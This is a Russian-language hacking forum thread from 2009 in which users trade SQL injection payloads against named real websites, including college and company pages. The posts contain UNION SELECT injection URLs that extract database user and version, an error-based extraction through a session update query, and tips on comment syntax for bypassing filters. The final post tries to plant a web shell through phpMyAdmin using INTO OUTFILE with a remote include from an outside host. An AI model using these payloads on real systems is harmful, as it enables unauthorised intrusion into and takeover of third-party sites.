HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.05.2009, 03:58
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами: 9076508

Репутация: 169
По умолчанию

да нет, зрячая)
Код:
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(concat_ws(0x3a,user(),version())+using+latin1),4,5,6,7,8/*
 
Ответить с цитированием

  #2  
Старый 22.05.2009, 17:49
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами: 9230381

Репутация: 90
По умолчанию

Код:
http://www.convex.ru/news/news-203.html?=1'
Как-нибудь можно дальше скуль раскрутить?

Ошибка в подвале страницы.
 
Ответить с цитированием

  #3  
Старый 22.05.2009, 19:57
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами: 9477026

Репутация: 2362
По умолчанию

Цитата:
Сообщение от InFlame  
Код:
http://www.convex.ru/news/news-203.html?=1'
Как-нибудь можно дальше скуль раскрутить?

Ошибка в подвале страницы.
Можно даже вывод сделать
Цитата:
[query: update session set value='last_url|s:51:"/news/news-203.html?=1',session_name=user(),value='";', update_date=now() where session_name='orica7dsmq18otn85ojtmvama3'
error: Duplicate entry 'convex@localhost' for key 1
in file: /home/convex/cms/inc/auto/session.inc at line: 42]
Когда идет упдейт сессии:
_http://www.convex.ru/news/news-203.html?=1',session_name=user(),value='
 
Ответить с цитированием

  #4  
Старый 23.05.2009, 01:31
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами: 10761096

Репутация: 27
По умолчанию

не работают "комментарии" в MySQL
нашел сайтик там в поле логина нет проверки на '.
ну и выдает при запросе 'union select 1/*
Код:
Context info for the following error/warning:
Error: 1024, Query(r) failed:
SELECT u.email, u.userid FROM user u WHERE u.username='1' union select 1/*' AND u.email=''
With result:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' AND u.email=''' at line 4
in /local/rnsw/www/32/apache2/maoli/core/library/db.php, 381

call: DB->queryex("r", "SELECT u.email, u.userid
FROM user u
WHERE u.username='1' union select 1/*'
AND u.email=''")
и так дальше в таком же духе... не --, не # не помогает... что можно попробывать?
 
Ответить с цитированием

  #5  
Старый 23.05.2009, 01:40
slammer
Новичок
Регистрация: 02.05.2009
Сообщений: 11
С нами: 8962091

Репутация: 0
По умолчанию

хм.. почему когда я в конце запроса ставлю /* то работает, а если -- то нет?
 
Ответить с цитированием

  #6  
Старый 23.05.2009, 01:54
slammer
Новичок
Регистрация: 02.05.2009
Сообщений: 11
С нами: 8962091

Репутация: 0
По умолчанию

Цитата:
Сообщение от slammer  
хм.. почему когда я в конце запроса ставлю /* то работает, а если -- то нет?
уже разобрался надо просто --+ добавлять и тогда работает. может ктонибудь объяснит в чем принципиальная разница между /* и --+ ?
 
Ответить с цитированием

  #7  
Старый 23.05.2009, 01:58
slammer
Новичок
Регистрация: 02.05.2009
Сообщений: 11
С нами: 8962091

Репутация: 0
По умолчанию

http://events.wayne.edu/index.php?cat=24'+order+by+2/*
при таком запросе поидее ошибки ведь не должно быть? сколько колонок не подбирал все время таже ошибка...
 
Ответить с цитированием

  #8  
Старый 23.05.2009, 02:34
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от slammer  
уже разобрался надо просто --+ добавлять и тогда работает. может ктонибудь объяснит в чем принципиальная разница между /* и --+ ?
зависит от версии mysql. Поэтому, не зная заранее, только методом научного тыка
 
Ответить с цитированием

  #9  
Старый 23.05.2009, 01:58
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

2slammer
http://www.phpclub.ru/mysql/doc/comments.html
 
Ответить с цитированием

  #10  
Старый 23.05.2009, 02:35
StarFire
Познающий
Регистрация: 11.09.2008
Сообщений: 94
С нами: 9296460

Репутация: 19
По умолчанию

пытаюсь залить шелл через phpmyadmin...

командой
select '<? @include("http://xxx.com/shell.txt"); ?>' into outfile '/usr/local/www/main/shell.php';

выдает ошибку
"Вероятно, размер загружаемого файла слишком велик. Способы обхода данного ограничения описаны в документации "

вес шелла 22кб

как обойти ?по албански не особо шарю

зы версия phpmyadmin 2.11.1.1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...